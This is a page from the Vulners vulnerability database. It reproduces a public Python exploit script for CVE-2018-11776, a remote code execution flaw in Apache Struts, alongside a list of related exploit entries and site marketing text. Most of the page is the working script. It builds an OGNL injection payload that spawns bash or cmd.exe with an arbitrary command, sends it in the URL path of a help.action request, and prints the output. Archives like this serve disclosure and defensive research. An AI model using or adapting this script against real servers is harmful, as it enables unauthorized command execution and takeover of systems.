Vulners
Lucene search
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Exploit
| Reporter | Title | Published | Views | Family All 135 |
|---|---|---|---|---|
 | Exploit for CVE-2018-11776 | 18 Jun 202018:07 | – | gitee |
| Exploit for CVE-2018-11776 | 2 Jan 202017:01 | – | gitee |
| Exploit for OS Command Injection in Gnu Bash | 27 Jul 202504:21 | – | gitee |
 | Exploit for CVE-2018-11776 | 23 Aug 201820:06 | – | githubexploit |
| Exploit for CVE-2018-11776 | 24 Aug 201803:01 | – | githubexploit |
| Exploit for CVE-2018-11776 | 28 Aug 201823:48 | – | githubexploit |
| Exploit for CVE-2018-11776 | 25 Aug 201812:45 | – | githubexploit |
| Exploit for Expression Language Injection in Atlassian Confluence_Data_Center | 6 Oct 202123:24 | – | githubexploit |
| Exploit for CVE-2018-11776 | 24 Aug 201803:01 | – | githubexploit |
| Exploit for CVE-2018-11776 | 24 Aug 201803:01 | – | githubexploit |
10
#!/usr/bin/python
# -*- coding: utf-8 -*-
# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
import sys
import urllib
import urllib2
import httplib
def exploit(host,cmd):
print "[Execute]: {}".format(cmd)
ognl_payload = "${"
ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
ognl_payload += "(#cmd='{}').".format(cmd)
ognl_payload += "(#iswin=(@[email protected]('os.name').toLowerCase().contains('win')))."
ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
ognl_payload += "(#p.redirectErrorStream(true))."
ognl_payload += "(#process=#p.start())."
ognl_payload += "(#ros=(@[email protected]().getOutputStream()))."
ognl_payload += "(@[email protected](#process.getInputStream(),#ros))."
ognl_payload += "(#ros.flush())"
ognl_payload += "}"
if not ":" in host:
host = "{}:8080".format(host)
# encode the payload
ognl_payload_encoded = urllib.quote_plus(ognl_payload)
# further encoding
url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))
print "[Url]: {}\n\n\n".format(url)
try:
request = urllib2.Request(url)
response = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
response = e.partial
print response
if len(sys.argv) < 3:
sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
exploit(sys.argv[1],sys.argv[2])
# 0day.today [2018-08-28] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Aug 2018 00:00Current
8.6High risk
Vulners AI Score8.6
EPSS0.99993